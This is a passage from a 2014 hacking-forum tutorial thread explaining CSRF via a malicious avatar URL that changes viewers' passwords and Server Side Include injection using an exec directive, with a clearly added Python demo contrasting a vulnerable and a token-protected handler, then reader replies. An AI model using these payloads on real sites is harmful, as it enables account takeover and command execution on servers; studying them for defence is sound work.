    It works when a state-changing action is done with a GET request and nothing in the request is secret. If CSRF succeeds, the attacker can for instance change some user's password. The most common vulnerable places are avatars, because the site loads whatever URL you set as your avatar in every visitor's browser.

    3) Exploiting vulnerability

    Let's say we have the profile link:
    http://www.link.com/profile.php

    where you can see user data (username, avatar, email...).
    A user edits their profile using e.g.
    http://www.link.com/edit_profile.php

    Now, instead of an avatar link, we set the profile-editing link together with the new value, passed with the GET method.

    NOTE: the profile edit has to accept the GET method during profile editing, otherwise we won't be able to attack this way.

    Add as avatar link:
    http://www.link.com/edit_profile.php?password=newpassword

    password is the name of the input (it can be different, it's best to check the source code).

    Now when we look at the avatar we won't see a picture (as if there is none). When another user views your avatar, their browser requests that URL with their own session cookie, and if the attack was successful their password is changed to the one we put in.
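    A request handler for the profile edit described above, once as the tutorial's vulnerable GET version and once hardened, as an added example that is not from the tutorial. The request shape (method, parameters, cookies), the session store, the user table and the names of the handlers are all constructed for the demo; the cookie name PHPSESSID and the edit_profile.php URL are the page's.

```python
import hmac
import secrets

# Constructed server state: session id -> {"user": name, "csrf": token}, plus the user table.
SESSIONS = {}
USERS = {"alice": {"password": "old-password", "avatar": ""}}


def login(user: str) -> str:
    """Create a session with a per-session anti-CSRF token and return the session id."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_hex(16)}
    return sid


def edit_profile_vulnerable(method, params, cookies):
    """edit_profile.php as the tutorial describes it: any method, no token, the cookie is enough."""
    session = SESSIONS.get(cookies.get("PHPSESSID"))
    if session is None:
        return 401, "not logged in"
    if "password" in params:
        USERS[session["user"]]["password"] = params["password"]
    return 200, "profile updated"


def edit_profile_hardened(method, params, cookies):
    """Same action, but a state change needs POST and a token only the site's own form knows."""
    session = SESSIONS.get(cookies.get("PHPSESSID"))
    if session is None:
        return 401, "not logged in"
    if method != "POST":
        return 405, "use POST"
    token = params.get("csrf_token", "")
    if not hmac.compare_digest(token, session["csrf"]):   # constant-time comparison
        return 403, "bad or missing csrf token"
    if "password" in params:
        USERS[session["user"]]["password"] = params["password"]
    return 200, "profile updated"


def victim_views_avatar(avatar_url, handler, cookies):
    """The victim's browser fetching <img src=avatar_url>: a GET with their cookies and no token."""
    path, _, query = avatar_url.partition("?")
    params = dict(p.split("=", 1) for p in query.split("&") if p)
    if not path.endswith("/edit_profile.php"):
        return 404, "not the profile editor"
    return handler("GET", params, cookies)


if __name__ == "__main__":
    sid = login("alice")
    cookies = {"PHPSESSID": sid}
    attack = "http://www.link.com/edit_profile.php?password=newpassword"
    print(victim_views_avatar(attack, edit_profile_vulnerable, cookies), USERS["alice"]["password"])
    USERS["alice"]["password"] = "old-password"
    print(victim_views_avatar(attack, edit_profile_hardened, cookies), USERS["alice"]["password"])
```

    Requiring POST alone is not enough, since a hidden auto-submitting form on another site can POST too; the token is what ties the request to a form the victim actually loaded from the site. Setting the session cookie with SameSite=Lax or Strict adds a second, browser-enforced layer.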

    [XVI] Server Side Includes | Server Side Inclusion

    1) Introduction to Server Side Includes

    Server Side Includes let us do some things faster on sites. With SSI we can include files, run programs, print variables and more; the directives are executed by the web server when the page is served. The default extension for SSI files is .shtml.
    For SSI to work, the directory where the .shtml file is located must be configured for it, usually through a .htaccess file that holds the configuration.
    SSI is disabled by default; you enable it by creating a new .htaccess file with this config:
    AddType text/html .shtml
    AddHandler server-parsed .shtml
    AddHandler server-parsed .html
    Options Indexes FollowSymLinks Includes

    (Options Includes turns on directive parsing including exec; Options IncludesNOEXEC would allow includes but refuse exec.)

    2) SSI creating

    A directive starts with <!--#
    A simple one looks like this:
    <!--#<command> <variable>="<variable content>" -->

    <command> -
    config
    include
    flow control (if / elif / else / endif)
    set
    printenv
    echo
    exec
    fsize
    flastmod
    time & date (the DATE_LOCAL and DATE_GMT variables, printed with echo)

    With --> we end the directive.

    Script e.g.
    <!--#include file="yourfilename.txt" -->
    <!--#echo var="DOCUMENT_NAME" -->

    (echo prints the value of a variable; the original example passed a literal sentence as var, which prints nothing useful because var expects a variable name. Literal text simply goes outside the directive.)

    3) Server Side Inclusion

    The Server Side Inclusion attack is a very useful attacking method. Basic knowledge of Bash and Batch scripting is recommended.

    A site is vulnerable to SSI when the extensions '.shtml', '.shtm' or '.stm' are handled by server-parsed in the Apache config and you can get your own content into such a file (through an upload, or through unfiltered input that is written into one).
    e.g. we can create a file with this command:
    <!--#exec cmd="ls -la" -->

    Save this as a .shtml file and open it on the site.

    I think you already know what is going to happen.
    Hope this helped you!

    Thanks For Reading

    credits: EliteHackForums
    02-12-2014 10:13 AM RE: HQ Guide - Web-Hacking Methods Tutorial | Edited by buglu 02-13-2014 03:22 AM
    Hey Hax,

    A very nice tutorial of different hacking methods!

    Also a very nice written guide on the most methods.

    But I want to point out that the nullbyte injection isn't really common anymore. It has been fixed since php 5.2.x or something. Teddy posted a link about it on my Thread: local file inclusion.


    But beside that, a very nice article
    02-12-2014 07:44 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    A very well put together tutorial. Thank you for sharing.
    02-13-2014 05:25 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    buglu wrote:
    Hey Hax,

    A very nice tutorial of different hacking methods!

    Also a very nice written guide on the most methods.

    But I want to point out that the nullbyte injection isn't really common anymore. It has been fixed since php 5.2.x or something. Teddy posted a link about it on my Thread: local file inclusion.


    But beside that, a very nice article


    Yeah, fine, but nullbyte injection is still there for reference.

    Thanks
    02-13-2014 05:26 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    Override wrote:
    A very well put together tutorial. Thank you for sharing.


    Yeah, it's my pleasure. I am just a SO Lov3r <3
    02-13-2014 09:02 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    This is great mate. Thanks for your efforts.
    02-16-2014 05:08 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    Great guide hax366!
    03-14-2014 11:14 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    Nice tutorial bro, thanks
    03-15-2014 05:22 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    Awesome
    JackerS
    03-23-2014 04:56 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    Would it be possible to get this in a PDF file?
    05-01-2014 02:11 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    Mark! Thank you very much! :P
    05-01-2014 07:50 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    Can you put this into a PDF?


    bye N
    05-11-2014 05:21 AM RE: HQ Guide - Web-Hacking Methods Tutorial
    That must be the most detailed tut I've ever seen!
    Thanks
    05-11-2014 09:09 PM RE: HQ Guide - Web-Hacking Methods Tutorial
    Wonder how long it took you to do this mate! THANKS
    06-30-2014 09:15 PM RE: HQ Guide - Web-Hacking Methods Tutorial | Edited by fishassassin 07-02-2014 11:54 PM
    Hey guys... Assuming it's okay with hax366, I'm in the process of converting his post into a PDF. It'll take some time, because formatting a file that large is really boring, but I should have it done in a day or two.

    EDIT: I've formatted the post into a .PDF to the best of my abilities, and uploaded it into the Security Override File Database under the 'articles' section. It is titled "hax366 webhacking tut.pdf"